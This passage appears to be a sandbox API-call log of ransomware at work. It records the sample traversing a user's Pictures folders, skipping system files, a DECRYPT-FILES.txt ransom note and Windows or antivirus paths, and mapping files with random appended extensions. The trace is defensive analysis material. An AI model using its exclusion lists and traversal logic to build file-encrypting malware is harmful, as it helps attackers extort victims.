HALPmcxz\\Pictures\\nTwgr\\avtMZ-q0LNqQWL.png.4Rj4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\ntwgr\\avtmz-q0lnqqwl.png.4rj4"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x264 [0186.023] GetFileSizeEx (in: hFile=0x264, lpFileSize=0x36fe228 | out: lpFileSize=0x36fe228*=86000) returned 1 [0186.023] CreateFileMappingW (hFile=0x264, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x268 [0186.023] MapViewOfFile (hFileMappingObject=0x268, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0186.024] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0186.024] CloseHandle (hObject=0x268) returned 1 [0186.024] CloseHandle (hObject=0x264) returned 1 [0186.024] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0186.024] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf840f00, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaf840f00, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaf840f00, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0186.025] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0186.025] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb7497360, ftCreationTime.dwHighDateTime=0x1d4d593, ftLastAccessTime.dwLowDateTime=0x4ee35880, ftLastAccessTime.dwHighDateTime=0x1d4cd10, ftLastWriteTime.dwLowDateTime=0xaf8ff5e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0xa693, dwReserved0=0x0, dwReserved1=0x0, cFileName="FcUVZVQezWKj.gif.VnGb", cAlternateFileName="FCUVZV~1.VNG")) returned 1 [0186.025] lstrcmpiW (lpString1="FcUVZVQezWKj.gif.VnGb", lpString2="DECRYPT-FILES.txt") returned 1 [0186.025] lstrcmpiW (lpString1="FcUVZVQezWKj.gif.VnGb", lpString2="autorun.inf") returned 1 [0186.025] lstrcmpiW (lpString1="FcUVZVQezWKj.gif.VnGb", lpString2="boot.ini") returned 1 [0186.025] lstrcmpiW (lpString1="FcUVZVQezWKj.gif.VnGb", lpString2="desktop.ini") returned 1 [0186.025] lstrcmpiW (lpString1="FcUVZVQezWKj.gif.VnGb", lpString2="ntuser.dat") returned -1 [0186.025] lstrcmpiW (lpString1="FcUVZVQezWKj.gif.VnGb", lpString2="iconcache.db") returned -1 [0186.025] lstrcmpiW (lpString1="FcUVZVQezWKj.gif.VnGb", lpString2="bootsect.bak") returned 1 [0186.025] lstrcmpiW (lpString1="FcUVZVQezWKj.gif.VnGb", lpString2="ntuser.dat.log") returned -1 [0186.025] lstrcmpiW (lpString1="FcUVZVQezWKj.gif.VnGb", lpString2="thumbs.db") returned -1 [0186.025] lstrcmpiW (lpString1="FcUVZVQezWKj.gif.VnGb", lpString2="Bootfont.bin") returned 1 [0186.025] lstrlenW (lpString="FcUVZVQezWKj.gif.VnGb") returned 21 [0186.025] lstrcmpiW (lpString1="VnGb", lpString2="lnk") returned 1 [0186.025] lstrcmpiW (lpString1="VnGb", lpString2="exe") returned 1 [0186.025] lstrcmpiW (lpString1="VnGb", lpString2="sys") returned 1 [0186.025] lstrcmpiW (lpString1="VnGb", lpString2="dll") returned 1 [0186.025] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\") returned 45 [0186.025] lstrlenW (lpString="FcUVZVQezWKj.gif.VnGb") returned 21 [0186.025] lstrcpyW (in: lpString1=0x36fea5c, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\" [0186.025] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\", lpString2="FcUVZVQezWKj.gif.VnGb" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\FcUVZVQezWKj.gif.VnGb") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\FcUVZVQezWKj.gif.VnGb" [0186.025] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0186.025] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\FcUVZVQezWKj.gif.VnGb" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\ntwgr\\fcuvzvqezwkj.gif.vngb"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x264 [0186.026] GetFileSizeEx (in: hFile=0x264, lpFileSize=0x36fe228 | out: lpFileSize=0x36fe228*=42643) returned 1 [0186.026] CreateFileMappingW (hFile=0x264, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x268 [0186.026] MapViewOfFile (hFileMappingObject=0x268, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0186.026] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0186.027] CloseHandle (hObject=0x268) returned 1 [0186.027] CloseHandle (hObject=0x264) returned 1 [0186.027] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0186.027] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x327c3e20, ftCreationTime.dwHighDateTime=0x1d4c98a, ftLastAccessTime.dwLowDateTime=0x78305be0, ftLastAccessTime.dwHighDateTime=0x1d4cb7e, ftLastWriteTime.dwLowDateTime=0xaf925740, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x1074a, dwReserved0=0x0, dwReserved1=0x0, cFileName="gGxu.bmp.DhZVP", cAlternateFileName="GGXUBM~1.DHZ")) returned 1 [0186.027] lstrcmpiW (lpString1="gGxu.bmp.DhZVP", lpString2="DECRYPT-FILES.txt") returned 1 [0186.027] lstrcmpiW (lpString1="gGxu.bmp.DhZVP", lpString2="autorun.inf") returned 1 [0186.027] lstrcmpiW (lpString1="gGxu.bmp.DhZVP", lpString2="boot.ini") returned 1 [0186.027] lstrcmpiW (lpString1="gGxu.bmp.DhZVP", lpString2="desktop.ini") returned 1 [0186.027] lstrcmpiW (lpString1="gGxu.bmp.DhZVP", lpString2="ntuser.dat") returned -1 [0186.027] lstrcmpiW (lpString1="gGxu.bmp.DhZVP", lpString2="iconcache.db") returned -1 [0186.027] lstrcmpiW (lpString1="gGxu.bmp.DhZVP", lpString2="bootsect.bak") returned 1 [0186.027] lstrcmpiW (lpString1="gGxu.bmp.DhZVP", lpString2="ntuser.dat.log") returned -1 [0186.027] lstrcmpiW (lpString1="gGxu.bmp.DhZVP", lpString2="thumbs.db") returned -1 [0186.027] lstrcmpiW (lpString1="gGxu.bmp.DhZVP", lpString2="Bootfont.bin") returned 1 [0186.027] lstrlenW (lpString="gGxu.bmp.DhZVP") returned 14 [0186.027] lstrcmpiW (lpString1="DhZVP", lpString2="lnk") returned -1 [0186.027] lstrcmpiW (lpString1="DhZVP", lpString2="exe") returned -1 [0186.027] lstrcmpiW (lpString1="DhZVP", lpString2="sys") returned -1 [0186.027] lstrcmpiW (lpString1="DhZVP", lpString2="dll") returned -1 [0186.027] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\") returned 45 [0186.027] lstrlenW (lpString="gGxu.bmp.DhZVP") returned 14 [0186.027] lstrcpyW (in: lpString1=0x36fea5c, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\" [0186.027] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\", lpString2="gGxu.bmp.DhZVP" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\gGxu.bmp.DhZVP") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\gGxu.bmp.DhZVP" [0186.027] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0186.028] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\gGxu.bmp.DhZVP" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\ntwgr\\ggxu.bmp.dhzvp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x264 [0186.028] GetFileSizeEx (in: hFile=0x264, lpFileSize=0x36fe228 | out: lpFileSize=0x36fe228*=67402) returned 1 [0186.028] CreateFileMappingW (hFile=0x264, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x268 [0186.028] MapViewOfFile (hFileMappingObject=0x268, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0186.029] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0186.029] CloseHandle (hObject=0x268) returned 1 [0186.029] CloseHandle (hObject=0x264) returned 1 [0186.029] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0186.029] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa92c8fc0, ftCreationTime.dwHighDateTime=0x1d4d191, ftLastAccessTime.dwLowDateTime=0xafaa2500, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xafaa2500, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="h371", cAlternateFileName="")) returned 1 [0186.029] lstrcmpW (lpString1="h371", lpString2=".") returned 1 [0186.029] lstrcmpW (lpString1="h371", lpString2="..") returned 1 [0186.029] lstrcatW (in: lpString1="h371", lpString2="\\" | out: lpString1="h371\\") returned="h371\\" [0186.029] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\", lpString2="h371\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\h371\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\h371\\" [0186.029] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\h371\\", lpSrch="\\Program Files") returned 0x0 [0186.029] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\h371\\", lpSrch=":\\Windows") returned 0x0 [0186.029] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\h371\\", lpSrch="\\Games\\") returned 0x0 [0186.029] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\h371\\", lpSrch="\\Tor Browser\\") returned 0x0 [0186.029] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\h371\\", lpSrch="\\ProgramData\\") returned 0x0 [0186.029] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\h371\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0186.029] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\h371\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0186.029] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\h371\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0186.029] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\h371\\", lpSrch="\\All Users") returned 0x0 [0186.030] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\h371\\", lpSrch="\\IETldCache\\") returned 0x0 [0186.030] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\h371\\", lpSrch="\\Local Settings\\") returned 0x0 [0186.030] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\h371\\", lpSrch="\\AppData\\Local") returned 0x0 [0186.030] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\h371\\", lpSrch="AhnLab") returned 0x0 [0186.030] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\h371\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0186.030] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\h371\\") returned 50 [0186.030] lstrlenW (lpString="0a16c9.tmp") returned 10 [0186.030] wsprintfW (in: param_1=0x36fe7f0, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\h371\\\\0a16c9.tmp") returned 61 [0186.030] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\h371\\\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\ntwgr\\h371\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x264 [0186.032] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\h371\\") returned 50 [0186.032] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0186.032] wsprintfW (in: param_1=0x36fe7f0, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\h371\\\\DECRYPT-FILES.txt") returned 68 [0186.032] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\h371\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\ntwgr\\h371\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0186.032] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\h371\\") returned 50 [0186.032] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\h371\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\h371\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\h371\\*" [0186.032] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\h371\\*", lpFindFileData=0x36ff010 | out: lpFindFileData=0x36ff010*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa92c8fc0, ftCreationTime.dwHighDateTime=0x1d4d191, ftLastAccessTime.dwLowDateTime=0xf196bb40, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xf196bb40, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4798f8 [0186.032] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0186.032] FindNextFileW (in: hFindFile=0x4798f8, lpFindFileData=0x36ff010 | out: lpFindFileData=0x36ff010*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa92c8fc0, ftCreationTime.dwHighDateTime=0x1d4d191, ftLastAccessTime.dwLowDateTime=0xf196bb40, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xf196bb40, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0186.032] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0186.032] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0186.032] FindNextFileW (in: hFindFile=0x4798f8, lpFindFileData=0x36ff010 | out: lpFindFileData=0x36ff010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf196bb40, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xf196bb40, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xf196bb40, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="0a16c9.tmp", cAlternateFileName="")) returned 1 [0186.032] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="DECRYPT-FILES.txt") returned -1 [0186.032] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="autorun.inf") returned -1 [0186.032] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="boot.ini") returned -1 [0186.032] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="desktop.ini") returned -1 [0186.032] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat") returned -1 [0186.032] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="iconcache.db") returned -1 [0186.032] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="bootsect.bak") returned -1 [0186.032] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat.log") returned -1 [0186.032] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="thumbs.db") returned -1 [0186.032] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="Bootfont.bin") returned -1 [0186.032] lstrlenW (lpString="0a16c9.tmp") returned 10 [0186.032] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0186.033] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0186.033] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0186.033] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0186.033] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\h371\\") returned 50 [0186.033] lstrlenW (lpString="0a16c9.tmp") returned 10 [0186.033] lstrcpyW (in: lpString1=0x36fe7e0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\h371\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\h371\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\h371\\" [0186.033] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\h371\\", lpString2="0a16c9.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\h371\\0a16c9.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\h371\\0a16c9.tmp" [0186.033] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0186.033] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\h371\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\ntwgr\\h371\\0a16c9.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0186.033] CloseHandle (hObject=0x0) returned 0 [0186.033] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0186.033] FindNextFileW (in: hFindFile=0x4798f8, lpFindFileData=0x36ff010 | out: lpFindFileData=0x36ff010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x86a04da0, ftCreationTime.dwHighDateTime=0x1d4d4c7, ftLastAccessTime.dwLowDateTime=0x2eec20f0, ftLastAccessTime.dwHighDateTime=0x1d4c605, ftLastWriteTime.dwLowDateTime=0xaf971a00, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0xa506, dwReserved0=0x0, dwReserved1=0x0, cFileName="41ny.bmp.HOU53Fk", cAlternateFileName="41NYBM~1.HOU")) returned 1 [0186.033] lstrcmpiW (lpString1="41ny.bmp.HOU53Fk", lpString2="DECRYPT-FILES.txt") returned -1 [0186.033] lstrcmpiW (lpString1="41ny.bmp.HOU53Fk", lpString2="autorun.inf") returned -1 [0186.033] lstrcmpiW (lpString1="41ny.bmp.HOU53Fk", lpString2="boot.ini") returned -1 [0186.033] lstrcmpiW (lpString1="41ny.bmp.HOU53Fk", lpString2="desktop.ini") returned -1 [0186.033] lstrcmpiW (lpString1="41ny.bmp.HOU53Fk", lpString2="ntuser.dat") returned -1 [0186.033] lstrcmpiW (lpString1="41ny.bmp.HOU53Fk", lpString2="iconcache.db") returned -1 [0186.034] lstrcmpiW (lpString1="41ny.bmp.HOU53Fk", lpString2="bootsect.bak") returned -1 [0186.034] lstrcmpiW (lpString1="41ny.bmp.HOU53Fk", lpString2="ntuser.dat.log") returned -1 [0186.034] lstrcmpiW (lpString1="41ny.bmp.HOU53Fk", lpString2="thumbs.db") returned -1 [0186.034] lstrcmpiW (lpString1="41ny.bmp.HOU53Fk", lpString2="Bootfont.bin") returned -1 [0186.034] lstrlenW (lpString="41ny.bmp.HOU53Fk") returned 16 [0186.034] lstrcmpiW (lpString1="HOU53Fk", lpString2="lnk") returned -1 [0186.034] lstrcmpiW (lpString1="HOU53Fk", lpString2="exe") returned 1 [0186.034] lstrcmpiW (lpString1="HOU53Fk", lpString2="sys") returned -1 [0186.034] lstrcmpiW (lpString1="HOU53Fk", lpString2="dll") returned 1 [0186.034] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\h371\\") returned 50 [0186.034] lstrlenW (lpString="41ny.bmp.HOU53Fk") returned 16 [0186.034] lstrcpyW (in: lpString1=0x36fe7e0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\h371\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\h371\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\h371\\" [0186.034] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\h371\\", lpString2="41ny.bmp.HOU53Fk" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\h371\\41ny.bmp.HOU53Fk") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\h371\\41ny.bmp.HOU53Fk" [0186.034] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0186.034] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\h371\\41ny.bmp.HOU53Fk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\ntwgr\\h371\\41ny.bmp.hou53fk"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x26c [0186.034] GetFileSizeEx (in: hFile=0x26c, lpFileSize=0x36fdfa8 | out: lpFileSize=0x36fdfa8*=42246) returned 1 [0186.034] CreateFileMappingW (hFile=0x26c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x270 [0186.035] MapViewOfFile (hFileMappingObject=0x270, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0186.035] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0186.035] CloseHandle (hObject=0x270) returned 1 [0186.035] CloseHandle (hObject=0x26c) returned 1 [0186.035] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0186.036] FindNextFileW (in: hFindFile=0x4798f8, lpFindFileData=0x36ff010 | out: lpFindFileData=0x36ff010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdc9b9a0, ftCreationTime.dwHighDateTime=0x1d4d1ef, ftLastAccessTime.dwLowDateTime=0x81f7b940, ftLastAccessTime.dwHighDateTime=0x1d4cdd9, ftLastWriteTime.dwLowDateTime=0xaf997b60, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0xf59, dwReserved0=0x0, dwReserved1=0x0, cFileName="5xeQDqiQHYKki.jpg.2IZpsxv", cAlternateFileName="5XEQDQ~1.2IZ")) returned 1 [0186.036] lstrcmpiW (lpString1="5xeQDqiQHYKki.jpg.2IZpsxv", lpString2="DECRYPT-FILES.txt") returned -1 [0186.036] lstrcmpiW (lpString1="5xeQDqiQHYKki.jpg.2IZpsxv", lpString2="autorun.inf") returned -1 [0186.036] lstrcmpiW (lpString1="5xeQDqiQHYKki.jpg.2IZpsxv", lpString2="boot.ini") returned -1 [0186.036] lstrcmpiW (lpString1="5xeQDqiQHYKki.jpg.2IZpsxv", lpString2="desktop.ini") returned -1 [0186.036] lstrcmpiW (lpString1="5xeQDqiQHYKki.jpg.2IZpsxv", lpString2="ntuser.dat") returned -1 [0186.036] lstrcmpiW (lpString1="5xeQDqiQHYKki.jpg.2IZpsxv", lpString2="iconcache.db") returned -1 [0186.036] lstrcmpiW (lpString1="5xeQDqiQHYKki.jpg.2IZpsxv", lpString2="bootsect.bak") returned -1 [0186.036] lstrcmpiW (lpString1="5xeQDqiQHYKki.jpg.2IZpsxv", lpString2="ntuser.dat.log") returned -1 [0186.036] lstrcmpiW (lpString1="5xeQDqiQHYKki.jpg.2IZpsxv", lpString2="thumbs.db") returned -1 [0186.036] lstrcmpiW (lpString1="5xeQDqiQHYKki.jpg.2IZpsxv", lpString2="Bootfont.bin") returned -1 [0186.036] lstrlenW (lpString="5xeQDqiQHYKki.jpg.2IZpsxv") returned 25 [0186.036] lstrcmpiW (lpString1="2IZpsxv", lpString2="lnk") returned -1 [0186.036] lstrcmpiW (lpString1="2IZpsxv", lpString2="exe") returned -1 [0186.036] lstrcmpiW (lpString1="2IZpsxv", lpString2="sys") returned -1 [0186.036] lstrcmpiW (lpString1="2IZpsxv", lpString2="dll") returned -1 [0186.036] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\h371\\") returned 50 [0186.036] lstrlenW (lpString="5xeQDqiQHYKki.jpg.2IZpsxv") returned 25 [0186.036] lstrcpyW (in: lpString1=0x36fe7e0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\h371\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\h371\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\h371\\" [0186.036] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\h371\\", lpString2="5xeQDqiQHYKki.jpg.2IZpsxv" | 